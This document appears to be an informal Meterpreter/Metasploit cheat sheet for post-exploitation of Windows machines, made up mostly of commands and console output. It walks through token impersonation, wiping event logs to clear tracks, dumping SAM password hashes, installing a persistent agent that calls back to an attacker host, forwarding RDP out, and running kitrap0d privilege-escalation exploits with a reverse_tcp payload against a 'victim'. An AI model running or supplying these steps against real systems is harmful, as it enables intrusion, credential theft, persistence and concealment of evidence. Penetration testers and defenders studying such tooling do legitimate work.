Yes, It's a better shell.
[ + ] Meterpreter Basics.
[ + ] Setting up a handler.
use exploit/multi/handler
show payloads
Find your meterpreter payload to listen for.
[ + ] Change directory on both victim and attacking machines.
--> Local Change Directory (Attacking Machine):
lcd /localDir/
--> Change directory in your shell (Vitim Machine):
[ + ] Token Impersonation:
meterpreter> use incognito Loading extension incognito...success. meterpreter> help Incognito Commands ================== Command Description ------- ----------- add_group_user Attempt to add a user to a global group with all tokens add_localgroup_user Attempt to add a user to a local group with all tokens add_user Attempt to add a user with all tokens impersonate_token Impersonate specified token list_tokens List tokens available under current user context snarf_hashes Snarf challenge/response hashes for every token meterpreter>
"What we will need to do first is identify if there are any valid tokens on this system. Depending on the level of access that your exploit provides, you are limited in the tokens you are able to view. When it comes to token stealing, SYSTEM is king. As SYSTEM, you are allowed to see and use any token on the box."
--> Pro Tip - Administrators don’t have access to all the tokens either, but they do have the ability to migrate to SYSTEM processes, effectively making them SYSTEM and able to see all the tokens available.
meterpreter> list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM SNEAKS.IN\Administrator Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON meterpreter>
meterpreter> impersonate_token SNEAKS.IN\\Administrator [+] Delegation token available [+] Successfully impersonated user SNEAKS.IN\Administrator meterpreter> getuid Server username: SNEAKS.IN\Administrator meterpreter>
meterpreter> shell Process 2804 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> whoami whoami SNEAKS.IN\administrator C:\WINDOWS\system32>
[ + ] Is it possible for me to run an exploit through meterpreter as a background job?
--> Yup.
meterpreter> run -j
[*] Exploit running as background job.
[ + ] Lets clear our tracks.
meterpreter> clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... meterpreter>
[ + ] File Transfer:
meterpreter> download C:\\boot.ini [*] downloading: C:\boot.ini -> C:\boot.ini [*] downloaded : C:\boot.ini -> C:\boot.ini/boot.ini meterpreter>
Similarly, we can perform uploads to the target system with the 'upload' command. This will expect an absolute path on your local file system to the file you wish you transfer over.
+ How can I execute something on the target machine?
meterpreter> execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
In this case, we execute cmd.exe on the target machine and specify that we want to interact with the process.
[ + ] Lets dump some hashes from the SAM Database.
meterpreter> run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: meterpreter>
Or you can just type hashdump
[ + ] Migrate to a more stable process.
meterpreter> run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter>
You can also specify to migrate to some PID. For example - use cmd.exe to open notepad and then grab the PID to migrate to it with: migrate <PID>
[ + ] Lets Install a persistent service.
meterpreter> run persistence -U -i 5 -p 443 -r <LHOST> [*] Creating a persistent agent: LHOST=LHOST LPORT=443 (interval=5 onboot=true) [*] Persistent agent script is 613976 bytes long [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs [*] Agent executed with PID 492 [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc meterpreter>
"We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address <LHOST> on port 443."
[ + ] Can we forward out a local port with meterpreter to on our attacking machine?
--> Yup.
meterpreter> portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L >opt> The local host to listen on (optional). -h Help banner. -l >opt> The local port to listen on. -p >opt> The remote port to connect on. -r >opt> The remote host to connect on. meterpreter>
[ + ] Lets forward out the RDP Service on the Victim Machine! For fun?
meterpreter> portfwd add –l 3389 –p 3389 –r <TARGET IP> [*] Local TCP relay created: >-> <TARGET IP>:3389 meterpreter>
--> Then, on your attacking machine:
+ Privilege Escalation with Meterpreter?
--> priv
meterpreter> use priv Loading extension priv...success. meterpreter>
--> getsystem
meterpreter> getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter>
[ + ] Local Exploits
meterpreter> background [*] Backgrounding session 1... msf exploit(ms10_002_aurora)> use exploit/windows/local/ ...snip... use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection ...snip... use exploit/windows/local/ms10_015_kitrap0d use exploit/windows/local/ms10_092_schelevator use exploit/windows/local/ms11_080_afdjoinleaf use exploit/windows/local/ms13_005_hwnd_broadcast use exploit/windows/local/ms13_081_track_popup_menu ...snip... msf exploit(ms10_002_aurora)>
msf exploit(ms10_002_aurora)> use exploit/windows/local/ms10_015_kitrap0d msf exploit(ms10_015_kitrap0d)> set SESSION 1 msf exploit(ms10_015_kitrap0d)> set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_015_kitrap0d)> set LHOST msf exploit(ms10_015_kitrap0d)> set LPORT 4443 msf exploit(ms10_015_kitrap0d)> show options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Windows 2K SP4 - Windows 7 (x86) msf exploit(ms10_015_kitrap0d) > exploit [*] Started reverse handler on [*] Launching notepad to host the exploit... [+] Process 4048 launched. [*] Reflectively injecting the exploit DLL into 4048... [*] Injecting exploit into 4048 ... [*] Exploit injected. Injecting payload into 4048... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (769024 bytes) to [*] Meterpreter session 2 opened ( -> at 2014-03-11 11:14:00 -0400 meterpreter> getuid Server username: NT AUTHORITY\SYSTEM meterpreter>
[ + ] Windows / Linux Post Modules (Meterpreter Enumeration)
[ + ] Not gonna lie, just check this out: for Windows Post:
[ + ] Same applies for Linux Post:
[ + ] Interested in Powershell and Meterpreter?
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